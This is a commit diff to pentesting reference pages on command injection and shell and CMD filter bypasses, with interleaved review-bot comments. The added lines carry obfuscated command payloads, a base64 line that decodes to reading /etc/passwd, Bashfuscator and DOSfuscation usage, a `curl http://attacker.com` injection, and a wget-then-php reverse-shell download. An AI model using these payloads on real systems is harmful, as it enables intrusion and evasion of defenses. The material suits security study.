GitBook: [#3532] No subject

CPol 2022-10-02 22:00:14 +00:00 committed by gitbook-bot
parent 7b172583b0
commit 58e5a59ae2
No known key found for this signature in database
GPG Key ID: 07D2180C7B12D0FF
3 changed files with 46 additions and 12 deletions


@ -55,15 +55,27 @@ ls *
# [chars]
/usr/bin/n[c] # /usr/bin/nc
# Quotes / Concatenation
# Quotes
'p'i'n'g # ping
"w"h"o"a"m"i # whoami
\u\n\a\m\e \-\a # uname -a
ech''o test # echo test
ech""o test # echo test
bas''e64 # base64
#Backslashes
\u\n\a\m\e \-\a # uname -a
/\b\i\n/////s\h
# $@
who$@ami #whoami
# Transformations (case, reverse, base64)
$(tr "[A-Z]" "[a-z]"<<<"WhOaMi") #whoami -> Upper case to lower case
$(a="WhOaMi";printf %s "${a,,}") #whoami -> transformation (only bash)
$(rev<<<'imaohw') #whoami
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==) #base64
# Execution through $0
echo whoami|$0
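Review bot: the line `\u\n\a\m\e \-\a # uname -a` appears twice in this hunk, once under `# Quotes` and again under `#Backslashes`; it is a backslash technique, so the copy under the quotes heading should go. The `#base64` comment on the `bash<<<$(base64 -d<<<...)` line says nothing about what the encoded text expands to, and the identical line is added again in the next hunk under `### Bypass pipes`, so either document the decoded command in the comment or cross-reference that section instead of duplicating the line. Minor: `${a,,}` requires bash 4.0 or later, so `(only bash)` would be more precise as `(bash 4+)`.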
@ -124,6 +136,12 @@ cat ${HOME:0:1}etc${HOME:0:1}passwd
cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd
```
### Bypass pipes
```bash
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
```
### Bypass with hex encoding
```bash
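Review bot: the new `### Bypass pipes` section is a bare command with no explanation; it should state that the `|` only exists inside the base64 text and appears after decoding, otherwise the heading does not match what the reader sees. It is also the same line added under `# Transformations` in the previous hunk, so one copy with a cross-reference is enough. A sentence noting that blocklisting single characters such as `|` is not an effective control once untrusted input reaches a shell would make the defensive point of the section explicit.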
@ -219,6 +237,13 @@ declare historywords
1%0a`curl http://attacker.com`
```
### Bashfuscator
```bash
# From https://github.com/Bashfuscator/Bashfuscator
./bashfuscator -c 'cat /etc/passwd'
```
### RCE with 5 chars
```bash
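Review bot: the `### Bashfuscator` snippet invokes `./bashfuscator` from the cloned directory but shows no install or dependency step; include the install command and Python requirement from the upstream README before the invocation, otherwise the snippet fails when followed verbatim. Also, the context line above it uses `attacker.com`, which is a real domain; the reserved documentation names (`example.com`, `.invalid`) are the safer choice in a page that readers copy from.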


@ -42,22 +42,17 @@ ls %0A id # %0A Execute both (RECOMMENDED)
`ls` # ``
$(ls) # $()
ls; id # ; Chain commands
ls${LS_COLORS:10:1}${IFS}id # Might be useful
#Not execute but may be interesting
> /var/www/html/out.txt #Try to redirect the output to a file
< /etc/passwd #Try to send some input to the command
```
### **Limition** Bypasses
### Bypasses
If you are trying to execute **arbitrary commands inside a linux machine** you will be interesting in read about this **Bypasses:**
If you are trying to execute **arbitrary commands inside a linux machine** you will be interesting in read about this [**WAF bypasses**](../linux-hardening/useful-linux-commands/bypass-bash-restrictions.md).
{% content-ref url="../linux-hardening/useful-linux-commands/bypass-bash-restrictions.md" %}
[bypass-bash-restrictions.md](../linux-hardening/useful-linux-commands/bypass-bash-restrictions.md)
{% endcontent-ref %}
### **Examples**
### **Examples:**
```
vuln=127.0.0.1 %0a wget https://web.es/reverse.txt -O /tmp/reverse.php %0a php /tmp/reverse.php
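Review bot: the reworded sentence keeps the grammar errors of the line it replaces: `you will be interesting in read about this` should read `you will be interested in reading about these`. The new link text `WAF bypasses` is also misleading, since `bypass-bash-restrictions.md` covers shell blocklist and restricted-shell bypasses rather than WAF evasion; `bash restriction bypasses` would match the target page. Minor: `### **Examples:**` introduces a trailing colon that the file's other headings do not use, and the example host `web.es` is a real domain where `example.com` would do.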


@ -447,8 +447,22 @@ net helpmsg 32 #32 is the code in that case
### Bypass Char Blacklisting
```bash
echo %HOMEPATH:~6,-11%
\
echo %HOMEPATH:~6,-11% #\
who^ami #whoami
```
### DOSfuscation
Generates an obfuscated CMD line
```powershell
git clone https://github.com/danielbohannon/Invoke-DOSfuscation.git
cd Invoke-DOSfuscation
Import-Module .\Invoke-DOSfuscation.psd1
Invoke-DOSfuscation
help
SET COMMAND type C:\Users\Administrator\Desktop\flag.txt
encoding
```
### Listen address ACLs
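Review bot: the DOSfuscation block is fenced as `powershell` but mixes PowerShell statements (`Import-Module`, `Invoke-DOSfuscation`) with input typed at the tool's own interactive menu (`help`, `SET COMMAND ...`, `encoding`); pasted into a PowerShell session it fails after the fourth line, so mark the menu lines as prompt input or comments. The `### Bypass Char Blacklisting` block above has the reverse problem: it is fenced as `bash` but contains CMD syntax (`%HOMEPATH:~6,-11%`, `who^ami`), where `#` is not a comment character. Also, `%HOMEPATH%` is `\Users\<name>`, so the `~6,-11` substring yields a single `\` only for one particular username length; the `#\` comment should state that assumption.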